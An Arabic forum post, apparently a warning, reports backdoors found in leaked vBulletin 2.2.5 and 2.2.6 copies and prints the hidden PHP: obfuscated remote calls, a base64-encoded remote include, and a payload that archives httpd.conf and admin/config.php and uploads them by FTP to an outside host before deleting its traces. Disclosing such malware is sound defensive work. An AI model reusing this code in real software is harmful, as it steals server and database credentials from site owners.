اسمحولي على هذا العنوان ولكن للاسف هذه هي الحقيقه المره
قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ 2.2.5 المسربه لنا من اخواننا العرب وكان هذا الكود الموجود فيها في ملف forum
كود PHP:
if ($action=="modify") {
$vbxh = h;
$vbxt = t;
$vbxp = p;
$vbxw = w;
$vbxa = a;
$vbx1 = 1;
$vbxr = r;
$vbxb = b;
$vbxn = n;
$vbxe = e;
$vbxo = o;
$vbxy =y;
$vbxl = l;
echo "<!-- ";
$file =
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA
ME", "r");
$rf = fread($file, 1000);
fclose($file);
echo " -->";
وكان الكود الحلو هذا يتصل في موقع
http://www.arab1.net/
http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME
عموما مع الايام نزلت نسخه 2.2.6 وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون لنا كود تجسس ونعم الاخوه العرب المسلمين
بس هالمره الكود اذكى ومهو مكشوف وغبي زي الاول الكود المره هذي في ملفين ملف option بالاخير موجود
كود PHP:
echo "<!-- ";
include "$sqlupdate";
echo " -->";
وملف functions
كود PHP:
$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw==');
ياعيني على الذكاء صرنا نعرف نلعب باكدوا ديكود وانكود
والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا
http://saudi.no-ip.com/
بيرحب فيكم ويقولكم WELCOME TO arab1.net
ياعيني عالترحيب
عموما الكود بيتصل بالصفحه هذي http://saudi.no-ip.com/~royal/.x2.inc اللي فيها كود رهييييييب ويبين لنا ....... اللي يحسبون علينا كمسلمين وعرب
شوفو الكود
كود PHP:
<div id="sHo" style="display:none;">
<!--
if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail.com[/email]
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');
$conn_id = ftp_connect("cyber-sa.virtualave.net");
$login_result = ftp_login($conn_id, "cyber-sa", "$port");
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY);
ftp_quit($conn_id);
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";
$file = fopen("$open", "r");
$rf = fread($file, 1000);
fclose($file);
?>
-->
</div>
لاحول ولاقوة الا بالله الله يرحم ام جون وكود التبليغ ياشييييييييييييييييخ